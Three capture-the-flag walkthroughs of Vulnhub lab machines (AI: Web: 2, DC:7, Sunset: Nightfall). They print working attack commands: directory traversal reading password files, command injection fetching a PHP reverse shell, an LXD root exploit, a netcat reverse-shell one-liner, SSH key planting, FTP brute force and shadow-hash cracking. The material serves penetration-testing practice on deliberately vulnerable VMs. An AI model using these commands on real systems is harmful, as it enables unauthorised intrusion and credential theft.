AI: Web: 2 Vulnhub Walkthrough

Today we are going to solve another CTF challenge called “AI: Web: 2”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This is the second box from the series AI: Web. The credit for making this lab goes to Mohammad Ariful. Let’s start and learn how to successfully breach it.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning

• Netdiscover
• Nmap

Enumeration

• Browsing HTTP Service
• Performing Directory Bruteforce
• Enumerating robot.txt

Exploiting

• Exploiting Directory Traversal
• Crack password hashes using John The Ripper
• Exploiting Command Injection to get a shell

Privilege Escalation

• Enumerating exploit 46978
• Enumerating for flag

Capture the flag

Walkthrough

Network Scanning

We will be running this lab in a Virtual Machine Player or Virtual Box.  After running the lab, we used the netdiscover command to check the IP Address of the lab.

netdiscover

This was found out to be 192.168.0.3.

Now we will run an aggressive port scan using nmap to gain the information about the open ports and the services running on the target machine.

nmap -A 192.168.0.3

We learned from the scan that we have the port 80 open which is hosting Apache httpd service. And we have the port 22 open which gives us the option to remotely connect to the target machine.

Enumeration

Since we got the port 80 open, we decided to browser the IP Address in the browser.

We also started a Directory Bruteforce in order to enumerate the machine further. This gave us a directory called webadmin as shown in the given image.

dirb http://192.168.0.3/

Upon finding the webadmin directory, we opened the URL in our browser. This gave us a Login Prompt. We don’t have any login credentials to proceed further here.

Back to the part, where we initially browsed the webpage, we found a signup option. We clicked that option. This gave us a form with the username option as shown in the image. So, we created a user account with the name “raj”.

On clicking the “OK” button, we get a panel as shown in the image given below. It shows us a welcome message “Welcome to XuezhuLi File Sharing”. This must be a service that is configured on the web server. This service seems interesting.

We googled the name of the service in hope to find any exploit. And we got the exploit db link.

On close inspection, we found that it contains a captured request marked as viewing.php. This shows the path that can be used to view the /etc/passwd on the target system.

viewing.php?file_name=../../../../../../../../../../../../../etc/passwd

Exploiting

So, we captured the request on our target machine using Burp Suite from the userpage.php.

Now we will right click here on the captured requested and select “Send to Repeater” option in the BurpSuite. Here we will change the GET request with the path that we found in the exploit earlier and send the request to get the response. Here we can see that the we have the /etc/passwd. Among all the other users, we found a user named aiweb2.

viewing.php?file_name=../../../../../../../../../../../../../etc/passwd

Even though, we have a user, we don’t have any passwords. We tried to crack the has by usual methods and dictionaries. It turned out to be useless. Then we turned to the Lab Description on the Vulnhub. Here we found a hint given by the lab author “You may need to crack password. Use wordlist SecLists/rockyou-45.txt”. So, we downloaded that wordlist and still tried to crack the hash.

You can download this wordlist by clicking here.

This also was of no use. We went on through research to find a move ahead and after hours and hours of googling and running through guides and manuals. We found that there are some credentials stored inside the /etc/apache2/.htpasswd.

viewing.php?file_name=../../../../../../../../../../../../../etc/apache2/.htpasswd

We modified our request from earlier to go to this path as shown in the image.

This proved to be a successful step. We found a user named aiweb2admin. Now that we have the username and the password hash. We tried to crack the hash using John The Ripper. We downloaded the wordlist mentioned before by the author and named it dict.txt. On running John, The Ripper, we found the password to be “c.ronaldo”

john --wordlist=dict .txt hash.txt

We went back to the user login panel on /webadmin/ and entered the following credentials

Username: aiweb2admin

Password: c.ronaldo

This was a success. We found some text written here, It says” I disallowed some contents from robots.” This was a simple hint for robots.txt.

As we understood the lab author is trying to hide contents from robot. That means we need to enumerate the robots.txt. On the inspection of robots.txt, we found two directories.

/H05Tpin9555/

/S0mextras/

We opened the /H05Tpin9555/, this gave us a form to enter the IP Address, and upon entering the IP Address, the Victim Machine will ping that particular IP Address. We tired and pinged 127.0.0.1. And the result of the command is show in the image given below. This is a simple case of Command Injection Vulnerability.

We will get back to in a minute but we thought of enumerating further another directory hidden in the robots. txt, “/S0meextras/”. We tried multiple ways to enumerate but all we have is this message” For juicy information in this dir”. This means that there is something in this directory. But to access this directory, first we will be needing an access on this machine.

We got back to our command injection. Here after trying multiple ways and different filters, we found that double pipe ‘||’ bypasses the command injection. We tried the id command with double pipe as shown in the image.

||id

Now that we have found our way in, we will use the php shell of pentest monkey to get a session over the target system. First, we will change the IP Address to our attacker machine (Kali).

After making the appropriate changes, we will run a python one liner to create a server on the port 8000. Now we will transfer the php shell to the target system with the wget command with the double pipe. After clicking the submit button, the shell will get uploaded as shown in the image.

||wget http://192.168.0.26:8000/shell.php

Now that the shell is successfully uploaded, we need to execute it by browsing it in our web browser, but before doing that we will create a netcat listener using the command given below. Remember to enter the port number that was in the shell.php file.

nc -lvp 1234

As soon as we execute the shell file, we have a shell over the target system. We have found our way in. Now its time to enumerate that S0mextras directory. As the directory was visible on the outside as a webpage. It must be in the var/www/html/ directory. So, we traversed to that directory. Here we found a directory named webadmin. We entered into that directory to find out targeted directory. In that directory, we ran the ls -al command. We did this to find any hidden directories. Here we found a text file named “.sshUserCred55512.txt”. Upon opening it we found the credentials of a user on the remote system as shown in the given image.

pwd

cd var/www/html

ls

cd webadmin

ls

cd S0mextras

ls -al

cat .sshUserCred55512.txt

So, we decided to login using those credentials. Upon logging in we ran the id command to reveal the user permissions. This gave us a very peculiar information that the user is a member of lxd group.

LXD is a next gen system container manager. It offers the user a similar environment as virtual machines. But using Linux containers. For more information read this wiki.

ssh n0nr00tuser@192.168.0.3

id

Privilege Escalation

We used the searchsploit to find any exploit related to lxd. And to our better knowledge, we got exactly what we wanted a privilege escalation exploit.

searchsploit lxd

searchsploit -m 46978

cat 46978.sh  

So, we downloaded the exploit using the (-m) parameter of the searchsploit command. After successfully downloading we opened the file to read using the cat command. Here we found the instruction of how to use the exploit.

So, we will follow these steps:

Step 1: Download build-alpine on Attacker Machine

So, we downloaded the build alpine using the link provided in the exploit.

wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine

Step 2: Build alpine as root user on Attacker Machine

After that we ran the alpine-build using the following command

bash build-alpine

On running the bash build command a tar.gz file is created in our working directory.

 

Step 3: Run this script and you will get root on the Victim Machine

Now we will transfer the file to the victim machine, we used the combination of python one liner and wget for this process. Now there seems to be some error in execution. What happens is that when we tried to execute this directly, we are not able execute it properly. But when we try this method, we are successful. We created a bash file named raj.sh and copied the 46978.sh code in this file. After that we provided it with giving the file proper permission to execute. Now we run the file with providing the tar.gz file in parameter.

wget http://192.168.0.26:8000/alpine-v3.10-x86_64-20190905_0123.tar.gz

nano raj.sh

chmod 777 raj.sh

./raj.sh -f alpine-v3.10-x86_64-20190905_0123.tar.gz 

Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine.

After running the bash file. We see that we have a different shell, it is the shell of the container. This container has all the files of the host machine. So, we enumerated for the flag and found it. This concludes this lab.

id

cd /mnt/root/root

ls

cat flag.txt

Dc:7 Vulnhub Walkthrough

DC:7 writeup, our another CTF challenges for CTF players and it can be download from vulnhub from here. The credit goes to “DCAU” for designing this VM machine for beginners. This is a Linux based CTF challenge where you can use your basic pentest skill to compromise this VM to escalate the root privilege shell.

Penetration Testing Methodologies

Network Scan

·         Nmap

Foot printing

Exploiting

·         SSH login

·         Abusing Drupal Drush

·         Compromising webshell via PHP Backdoor

Privilege Escalation

·         Abusing writable Script

·         Capture the Flag

Walkthrough

Network Scanning

Let's start with a network scan using an aggressive Nmap scan as we always do, and this time also we will go with the same approach for identify open port for running services.

nmap -A 192.168.1.101

Hmmm! So nmap showed very exciting & cool outcome, specifically on port 80 that is accessible to HTTP service and is also used to operate drupal CMS, additionally 15 submissions for robot.txt is like a cheery on a cake.

Enumeration

Further, we need to start enumeration against the host machine, therefore without wasting time, we navigate to a web browser for exploring HTTP service, and DC:7- Welcome page will opened in the browser that gave us a hint to search “outside the box” and this hint might be connected with internet.

At the end of this web page we observed another hint “@DC7User” which could be any possible username.

By considering the above listed hint, we start footprinting on the @DC7-user and find the DC7-user twitter account. This account contains a link to GitHub: https:/github.com/Dc7User, maybe the author was pointing to this link.

And the github url content a staffdb which is PHP repositories.

So when we have opened the staffdb, here config.php looks more interesting and a note i.e. as depicted below:

“This is some "code" (yes, it's not the greatest code, but that wasn't the point) for the DC-7 challenge.

This isn't a flag, btw, but if you have made it here, well done anyway. :-)”

We found credential from inside config.php as shown below:

Username: dc7user

Password: MdR3xOgB7#dW

With the help of above enumerated credential we try to connect with ssh and after obtaining tty shell we go for post enumeration and start directory traversing.

ssh dc7user@192.168.1.101

At first, we're looking for a directory list where we've found an "mbox" named file that contains an inbox message. The message contains /opt/script/backup.sh as subject of the message, let’s explore more.

I

nside backup.sh we notice it is using drush which is stands for Drupal shell and it is a command line utility that is used to communicate with drupal CMS.

So, I looked at the drush command in google and found a command that was used to change an account's password.

Therefore, we try to change admin password using below command:

drush user-password admin --password=raj

Now, we've changed the password for the admin account to login to Drupal and explore the following URL:

http://192.168.1.101/user/login

After accessing the admin console, it was time to exploit web application by injecting malicious content inside it. Directly writing malicious scripts as web content will not give us the reverse shell of the application but after spending some time, we concluded that it requires PHP module. We, therefore, move to install new module through Manage>Extend>List>Install new module.

You can download the PHP package for Drupal from the URL below and upload the tar file to install the new module.

https://www.drupal.org/project/php

So, when installation is completed, we need to enable to added module.

Again, move to Manage > Extend >filters and enable the check box for PHP filters.

Now use Pentest monkey PHP script i.e “reverse_shell_backdoor.php” to be inject as basic content. Do not forget to add listening IP and Port for obtaining reverse connection. Further change text format into PHP and enable the check box for publish. Keep the netcat listener ON to receive incoming shell.

Now use the Pentest monkey PHP script, i.e. "reverse shell backdoor.php" to be injected as a basic content. Don't forget to add an “listening IP & port” to get a reversed connection. Continue to change the “text format to PHP” and enable the publishing checkbox. Keep the netcat listener ON in order to receive the incoming shell.

When everything is set correctly, click the preview button and you'll get the reverse connection over the netcat.

Great!! we have our netcat session as www-data and if you will check permission on /opt/scripts/backup.sh, you will notice, that www-data has all permission to access or modify this file. We can therefore abuse the rights of the user file for escalating privileges by modifying the contents of the source.

Privilege Escalation

As said above we’ll try to abuse writable permission assign on the script. Thus, we use msfvenom to generate a malicious piece of code for obtaining bash shell.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.106 lport=8888 R

Now copy the generated code and start a another netcat listener on a new terminal.

mkfifo /tmp/ulgg; nc 192.168.1.106 8888 0

/tmp/ulgg 2>&1; rm /tmp/ulgg

Paste the code copied above in the previous netcat session under the www-data shell and wait for some time and get back to another netcat listener.

After some time, you will have access to the root shell, you will now get the final flag in the root directory as shown below.

Sunset: Nightfall Vulnhub Walkthrough

We have another CTF challenges for CTF players that named as “Sunset: nightfall” and it can be download from vulnhub from here. The credit goes “whitecr0wz” for designing this VM machine for beginners. This is a Linux based CTF challenge where you can use your basic pentest skill for Compromising this VM to escalate the root privilege shell.

Level: Easy

Task: Boot to Root

Penetrating Methodologies

Network Scanning

·         Netdiscover

·         Nmap

Enumeration

·         Enum4linux

Exploiting

·         FTP Brute force

·         Injecting blank SSH key

·         SSH login

Privilege Escalation

·         SUID Binaries

·         Sudo Rights

Walkthrough

Network Scanning

Let’s begin with the network scan using netdiscover to identify the host machine IP.

netdiscover

And this gave 192.168.0.24 as Host IP, now we will move toward ports and service scan further.

For deep network scan we always prefer to use nmap aggressive scan and this time also we will go with the same approach, thus will run the below command to enumerate running services and open port.

nmap -A 192.168.0.24

From its scan result, we found that it has multiple open ports for various services but here port 21 i.e. look interesting as it is using pyftplib for ftp.

Enumeration

For more detail we need to start enumeration against the host machine, therefore, we navigate to a web browser for exploring HTTP service but we found nothing at this place.

While enumerating SMB service we found two use name “nightfall” & “matt” with help of Enum4linux.

enum4linux 192.168.0.24

Exploiting

Since we have enumerated two usernames let’s go for brute force attack with the help of hydra and try to find its password for login into FTP

hydra -l matt -P /usr/share/wordlists/rockyou.txt 192.168.0.24 ftp -e nsr

Great! “Cheese” 😊is the password of user “matt” let’s use this credential for ftp login.

We logged into FTP successfully, since we were logged inside the host machine but to access proper shell we need to compromise TTY shell, therefore we decide to upload a malicious file inside /var/www/html but unfortunately we were unable to access that directory.

This is due to pyftplib which is using python library for FTP and might be File sharing is allowed on any particular directory hence we are unable to access /var/www/html directory.

But still we have another approach i.e. SSH key placement which means we will try to inject our created SSH key inside the host machine and access the pty shell of the host machine via ssh and this can be achieved when we will create an .ssh named folder and upload our ssh key inside it.

Thus, in our local machine we created a ssh key with blank passphrase using ssk-keygen and it will create two files. Then we copied id_rsa.pub file into another file and named “authorized_keys” and we need to transfer this file inside host machine.

As we already have FTP access of the host machine therefore it becomes easy to for us to upload authorized_keys inside the .ssh directory which we have created earlier.

So, when we try to connect with ssh as matt user, we got login successfully as shown in the below image. At this phase we have compromised the host machine and to get access of root shell we need bypass user privileges, therefore without wasting time we try to identify SUID enabled binaries with help of find command.

ssh matt@192.168.0.27

find / -perm -u=s -type f 2>/dev/null

So, we found /script/find has SUID permissions and it work similar as Linux-Find utility thus we try to execute /bin/sh command and obtain nightfall shell access.

./find . -exec /bin/sh -p \; -quit

So, we got access of nightfall shell where we found our 1^st flag from inside user.txt file.

But this was limited shell thus to access proper shell as nightfall, we try to apply previous approach of placing blank passphrase ssh key. Therefore inside /home/nightfall we created a .ssh named folder and upload the authorized_key which we had created previously.

Privilege Escalation

Now repeat the same and try to connect with ssh as nightfall and you will get ssh shell like us as shown in below image. Further, we check sudo right for nightfall and observe he has sudo right for cat program which means we can read higher privilege such as shadow.

ssh nightfall@192.168.0.27

sudo -l

we have executed the following command for reading shadow file and obtain some hash value.

sudo cat /etc/shadow

So, we saved the hash of user: root in a text file and then use john the ripper for cracking hash.

Booomm!! We got user: root password: miguel2

Using above credential i.e. root:miguel2 we got the root shell access and inside /root directory we found our final flag.